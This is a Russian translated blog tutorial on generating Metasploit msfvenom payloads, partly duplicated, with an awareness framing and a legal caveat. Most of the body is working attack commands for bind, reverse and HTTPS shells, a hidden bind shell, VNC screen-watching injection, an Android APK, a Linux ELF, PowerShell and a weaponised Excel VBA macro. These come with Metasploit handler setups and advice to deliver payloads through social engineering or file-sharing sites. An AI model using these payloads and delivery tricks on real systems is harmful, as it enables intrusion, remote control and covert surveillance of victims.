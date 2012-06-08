О создании пэйлоадов для разных платформ с помощью msfvenom
- Перевод
«Голова — лучший антивирус», — эта идея никогда не потеряет актуальности. Для того, чтобы эффективно бороться с компьютерными угрозами, надо знать своих врагов. Среди таких врагов — программы, которые позволяют незаметно подключаться к компьютеру и выполнять с ним некие действия, проще говоря, софт для взлома систем. Полагаем, знание того, как создают подобный софт, хотя бы на базовом уровне, понимание того, как он работает, полезно любому, кого волнуют вопросы компьютерной безопасности. Кроме того, такой софт можно использовать для проверки защищённости собственных систем.
Поэтому сегодня мы решили поделиться с вами переводом материала, автор которого рассказывает о том, как создавать и применять пэйлоады, или полезные нагрузки, предназначенные для удалённого управления различными системами, в частности — Windows, Linux и Android, с использованием msfvenom — инструмента командной строки из пакета Metasploit. Сразу хочется отметить, что к тому, что вы узнаете ниже, стоит относиться с осторожностью, помня о том, что несанкционированное проникновение в чужие системы — это неэтично и незаконно.
Для того, чтобы попробовать то, о чём пойдёт речь, на практике, вам понадобится компьютер с установленной на нём Kali Linux, компьютеры под управлением Windows и Linux, Android-смартфон. В процессе работы, при составлении команд, мы будем пользоваться следующими ключами:
В терминале Kali введём команду
Bind shell — это схема взаимодействия с удалённой консолью, при которой на целевом компьютере запускается сервис, к которому может подключиться атакующий. Фактически, речь идёт о прямом подключении к атакуемому компьютеру. Для того, чтобы создать соответствующий пэйлоад для Windows, нужно выполнить следующую команду в терминале:
В результате будет создан exe-файл, который будет сохранён по адресу, указанному при выполнении команды, а именно — это
Теперь запустим
После выполнения файла в нашем распоряжении окажется meterpreter-подключение к целевому компьютеру:
Использованная здесь опция
Reverse Shell (или Reverse TCP, или connect-back, или обратное подключение) — это схема взаимодействия с удалённым компьютером, обратная вышеописанной. При её использовании нужно, чтобы атакующий сначала запустил на своей машине сервер, при этом целевая машина будет играть роль клиента, который подключается к этому серверу, после чего атакующий получает доступ к оболочке целевого компьютера.
Для того, чтобы создать соответствующую полезную нагрузку, нужно ввести в терминале Kali следующую команду:
В данном случае мы включаем в команду некоторые новые параметры, такие, как
После того, как пэйлоад создан, отправлен на атакуемый компьютер и выполнен там, мы переходим ко второму шагу атаки. Запустим
На нижеприведённом рисунке видно, что после того, как жертва запустит пэйлоад, выполняется обратное подключение к нашему компьютеру и у нас оказывается сессия
Обратите внимание на то, что обе вышеописанные атаки осуществимы в том случаем, если на машине жертвы имеются подходящие работающие порты. Сейчас мы попытаемся найти выход из ситуации, когда на интересующем нас компьютере порты заблокированы. В подобном случае можно сориентироваться в ситуации и создать пэйлоад, например, воспользовавшись портом 443 для HTTPS. Для этого нужно ввести в терминале Kali следующую команду:
После создания пэйлоада и отправки его жертве, которая, как ожидается, рано или поздно запустит соответствующий файл, мы переходим к следующему шагу. Запускаем
Как видно на следующем рисунке, после того, как пэйлоад будет запущен на целевом компьютере, происходит обратное подключение к нашему компьютеру и мы можем пользоваться возможностями сессии meterpreter.
Исследуем ещё одну возможность msfvenom и попытаемся с её помощью обрести контроль над удалённым компьютером. В этот раз мы хотим заполучить доступ к командной оболочке, а не к сессии meterpreter.
Пэйлоад, который мы создадим нижеприведённой командой, после выполнения, прячется в системе, его нельзя обнаружить сканером портов.
После того, как файл готов и отправлен жертве, мы можем перейти к следующему шагу. А именно, воспользуемся Netcat, введя в терминале Kali следующую команду:
Теперь рассмотрим ещё один подход к использованию пэйлоадов типа
После создания файла и отправки его на атакуемый компьютер, создадим прослушиватель порта с использованием
При условии, что наш пэйлоад был успешно выполнен на удалённом компьютере, ниже показано то, как выглядит подключение к нему.
Создадим пэйлоад в виде VBA-скрипта, который будем использовать в качестве макроса MS Excel для атаки на целевую машину. Для того, чтобы это сделать, выполним следующую команду в терминале Kali:
После выполнения команды, нужно скопировать то, что выделено на рисунке выше, от
Тут введём имя макроса и нажмём на кнопку
После этого надо вставить в редакторе VBA ранее скопированный код пэйлоада, закрыть редактор и включить макросы.
Теперь можно заполнить Excel-файл какими-нибудь правдоподобно выглядящими данными, в нашем случае — это просто слово
Когда Excel-файл будет открыт на интересующем нас компьютере, жертве будет предложено включить макросы. После их включения выполнится VBA-скрипт, который создаст обратное подключение к удалённому компьютеру. Выглядеть это будет так, как показано ниже.
Хотя и неприлично, без ведома человека, наблюдать за тем, что он делает за компьютером, тот пэйлоад, который мы создадим сейчас, занимается именно этим. Откроем терминал Kali и введём следующую команду:
После создания пэйлоада мы, как обычно, отправляем его жертве, после чего начинаем готовиться к подключению. Для этого вызываем в терминале команду
Тут можно видеть, что выполнена VNC-инъекция, что установлено удалённое соединение. Так же на компьютере под управлением Kali откроется окно Remote Desktop.
Взлом мобильных устройств всегда привлекал к себе немалое внимание, поэтому рассмотрим методику создания пэйлоадов для платформы Android. Откроем терминал Kali и введём следующую команду:
После подготовки apk-файла его нужно передать на интересующее нас мобильное устройство. Затем нужно подготовиться к подключению на Kali:
После того, как пэйлоад будет запущен, в нашем распоряжении будет сессия meterpreter и мы сможем взаимодействовать со взломанным телефоном.
Откроем терминал Kali и введём следующую команду:
После создания файла его нужно отправить на компьютер жертвы и подготовиться к подключению:
После выполнения пэйлоада будет создано обратное TCP-подключение к нашему компьютеру, которое предоставит в наше распоряжение сессию meterpreter.
Для того, чтобы создать пэйлоад для PowerShell, откроем терминал Kali и введём следующую команду:
Теперь, как обычно, после создания пэйлоада, передадим его на интересующий нас компьютер и подготовимся принять подключение:
После запуска пэйлоад создаст обратное подключение к оболочке. Выглядит это так, как показано ниже.
Как видите, с использованием msfvenom очень просто создавать программы, предназначенные для удалённого подключения к самым разным системам. То, что это доступно даже пользователям с минимальной подготовкой, придаёт особую актуальность правилу, которое знают все, но далеко не все соблюдают: «Не открывайте файлы, в происхождении которых сомневаетесь».
Уважаемые читатели! Известны ли вам случаи взлома систем с использованием пэйлоадов, похожих на те, о которых мы сегодня говорили?
Поэтому сегодня мы решили поделиться с вами переводом материала, автор которого рассказывает о том, как создавать и применять пэйлоады, или полезные нагрузки, предназначенные для удалённого управления различными системами, в частности — Windows, Linux и Android, с использованием msfvenom — инструмента командной строки из пакета Metasploit. Сразу хочется отметить, что к тому, что вы узнаете ниже, стоит относиться с осторожностью, помня о том, что несанкционированное проникновение в чужие системы — это неэтично и незаконно.
Предварительные требования
Для того, чтобы попробовать то, о чём пойдёт речь, на практике, вам понадобится компьютер с установленной на нём Kali Linux, компьютеры под управлением Windows и Linux, Android-смартфон. В процессе работы, при составлении команд, мы будем пользоваться следующими ключами:
- Lhost — IP-адрес компьютера, на котором установлена Kali, то есть — нашей рабочей машины.
- Lport — порт, который назначен серверу — программе, которая «слушает» сеть и ожидает подключения от клиента.
- P — сокращение от «payload», пэйлоад для выбранной платформы
- F — ключ, задающий тип файла, например, exe для Windows, apk для Android, и так далее.
В терминале Kali введём команду
msfvenom. Результаты её работы показаны ниже. А именно, будет выведен список всех доступных опций для создания пэйлоадов. Тут мы рассмотрим лишь некоторые из них.
Организация Bind Shell-подключения
Bind shell — это схема взаимодействия с удалённой консолью, при которой на целевом компьютере запускается сервис, к которому может подключиться атакующий. Фактически, речь идёт о прямом подключении к атакуемому компьютеру. Для того, чтобы создать соответствующий пэйлоад для Windows, нужно выполнить следующую команду в терминале:
msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe
В результате будет создан exe-файл, который будет сохранён по адресу, указанному при выполнении команды, а именно — это
/root/Desktop/bind.exe. Полученный файл нужно каким-то образом доставить на компьютер жертвы и выполнить его. Например — воспользоваться методами социальной инженерии или выложить его на сервис обмена файлами.
Теперь запустим
msfconsole и введём нижеприведённые команды для того, чтобы открыть сессию:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
msf exploit(handler) > set rhost IP 192.168.0.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
После выполнения файла в нашем распоряжении окажется meterpreter-подключение к целевому компьютеру:
Использованная здесь опция
bind_tcp полезна в тех случаях, когда мы отключаемся от компьютера жертвы, но он при этом ещё работает. Мы можем выполнить ту же команду и подключиться снова, при этом не нужно, чтобы эксплойт снова запускали на удалённом компьютере.
Организация Reverse Shell-подключения
Reverse Shell (или Reverse TCP, или connect-back, или обратное подключение) — это схема взаимодействия с удалённым компьютером, обратная вышеописанной. При её использовании нужно, чтобы атакующий сначала запустил на своей машине сервер, при этом целевая машина будет играть роль клиента, который подключается к этому серверу, после чего атакующий получает доступ к оболочке целевого компьютера.
Для того, чтобы создать соответствующую полезную нагрузку, нужно ввести в терминале Kali следующую команду:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe.
В данном случае мы включаем в команду некоторые новые параметры, такие, как
lhost (локальный хост),
lport (локальный порт) для того, чтобы принять обратное соединение от компьютера жертвы.
После того, как пэйлоад создан, отправлен на атакуемый компьютер и выполнен там, мы переходим ко второму шагу атаки. Запустим
msfconsole и введём следующие команды для того, чтобы организовать подключение удалённого компьютера к нашей машине.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost IP 192.168.0.107
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
На нижеприведённом рисунке видно, что после того, как жертва запустит пэйлоад, выполняется обратное подключение к нашему компьютеру и у нас оказывается сессия
meterpreter.
Организация Reverse HTTPS-подключения
Обратите внимание на то, что обе вышеописанные атаки осуществимы в том случаем, если на машине жертвы имеются подходящие работающие порты. Сейчас мы попытаемся найти выход из ситуации, когда на интересующем нас компьютере порты заблокированы. В подобном случае можно сориентироваться в ситуации и создать пэйлоад, например, воспользовавшись портом 443 для HTTPS. Для этого нужно ввести в терминале Kali следующую команду:
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe
После создания пэйлоада и отправки его жертве, которая, как ожидается, рано или поздно запустит соответствующий файл, мы переходим к следующему шагу. Запускаем
msfconsole и вводим следующие команды для организации подключения:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set lhost IP 192.168.0.107
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit
Как видно на следующем рисунке, после того, как пэйлоад будет запущен на целевом компьютере, происходит обратное подключение к нашему компьютеру и мы можем пользоваться возможностями сессии meterpreter.
Скрытое Bind Shell-подключение
Исследуем ещё одну возможность msfvenom и попытаемся с её помощью обрести контроль над удалённым компьютером. В этот раз мы хотим заполучить доступ к командной оболочке, а не к сессии meterpreter.
Пэйлоад, который мы создадим нижеприведённой командой, после выполнения, прячется в системе, его нельзя обнаружить сканером портов.
msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe
После того, как файл готов и отправлен жертве, мы можем перейти к следующему шагу. А именно, воспользуемся Netcat, введя в терминале Kali следующую команду:
nc 192.168.0.100 1010
Reverse Shell-подключение с помощью Netcat
Теперь рассмотрим ещё один подход к использованию пэйлоадов типа
shell_reverse_tcp, которые позволяют получить доступ к оболочке командной строки атакуемого компьютера. Введём в терминале Kali следующую команду:
msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe
После создания файла и отправки его на атакуемый компьютер, создадим прослушиватель порта с использованием
netcat:
nc -lvp 1111
При условии, что наш пэйлоад был успешно выполнен на удалённом компьютере, ниже показано то, как выглядит подключение к нему.
Пэйлоады-макросы на VBA
Создадим пэйлоад в виде VBA-скрипта, который будем использовать в качестве макроса MS Excel для атаки на целевую машину. Для того, чтобы это сделать, выполним следующую команду в терминале Kali:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba
После выполнения команды, нужно скопировать то, что выделено на рисунке выше, от
#if vba 7 до
End if. Далее, откроем файл MS Excel, нажмём
Alt+F11 для вызова окна управления макросами.
Тут введём имя макроса и нажмём на кнопку
Create. Макрос мы хотим сохранить в открытой книге, поэтому в соответствующем выпадающем списке надо выбрать
This Workbook.
После этого надо вставить в редакторе VBA ранее скопированный код пэйлоада, закрыть редактор и включить макросы.
Теперь можно заполнить Excel-файл какими-нибудь правдоподобно выглядящими данными, в нашем случае — это просто слово
Test, сохранить и отправить жертве. Для организации подключения к удалённому компьютеру нужно открыть терминал Kali, выполнить команду
msfconsole, после чего ввести следующие команды:
msf > use exploit/multi/handler
msf exploit(handler) > set paylaod windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost=192.168.0.107
msf exploit(handler) > set lport= 7777
msf exploit(handler) > exploit
Когда Excel-файл будет открыт на интересующем нас компьютере, жертве будет предложено включить макросы. После их включения выполнится VBA-скрипт, который создаст обратное подключение к удалённому компьютеру. Выглядеть это будет так, как показано ниже.
VNC-пэйлоад
Хотя и неприлично, без ведома человека, наблюдать за тем, что он делает за компьютером, тот пэйлоад, который мы создадим сейчас, занимается именно этим. Откроем терминал Kali и введём следующую команду:
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe
После создания пэйлоада мы, как обычно, отправляем его жертве, после чего начинаем готовиться к подключению. Для этого вызываем в терминале команду
msfconsole и делаем следующее:
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport= 5900
msf exploit(handler) > exploit
Тут можно видеть, что выполнена VNC-инъекция, что установлено удалённое соединение. Так же на компьютере под управлением Kali откроется окно Remote Desktop.
Пэйлоад для Android
Взлом мобильных устройств всегда привлекал к себе немалое внимание, поэтому рассмотрим методику создания пэйлоадов для платформы Android. Откроем терминал Kali и введём следующую команду:
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk
После подготовки apk-файла его нужно передать на интересующее нас мобильное устройство. Затем нужно подготовиться к подключению на Kali:
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 8888
msf exploit(handler) > exploit
После того, как пэйлоад будет запущен, в нашем распоряжении будет сессия meterpreter и мы сможем взаимодействовать со взломанным телефоном.
Пэйлоад для Linux
Откроем терминал Kali и введём следующую команду:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell
После создания файла его нужно отправить на компьютер жертвы и подготовиться к подключению:
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lhost 4444
msf exploit(handler) > run
После выполнения пэйлоада будет создано обратное TCP-подключение к нашему компьютеру, которое предоставит в наше распоряжение сессию meterpreter.
Пэйлоад для PowerShell
Для того, чтобы создать пэйлоад для PowerShell, откроем терминал Kali и введём следующую команду:
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat
Теперь, как обычно, после создания пэйлоада, передадим его на интересующий нас компьютер и подготовимся принять подключение:
msf > use multi/handler
msf exploit(handler) > set payload cmd/windows/reverse_powershell
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
После запуска пэйлоад создаст обратное подключение к оболочке. Выглядит это так, как показано ниже.
Итоги
Как видите, с использованием msfvenom очень просто создавать программы, предназначенные для удалённого подключения к самым разным системам. То, что это доступно даже пользователям с минимальной подготовкой, придаёт особую актуальность правилу, которое знают все, но далеко не все соблюдают: «Не открывайте файлы, в происхождении которых сомневаетесь».
Уважаемые читатели! Известны ли вам случаи взлома систем с использованием пэйлоадов, похожих на те, о которых мы сегодня говорили?
Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.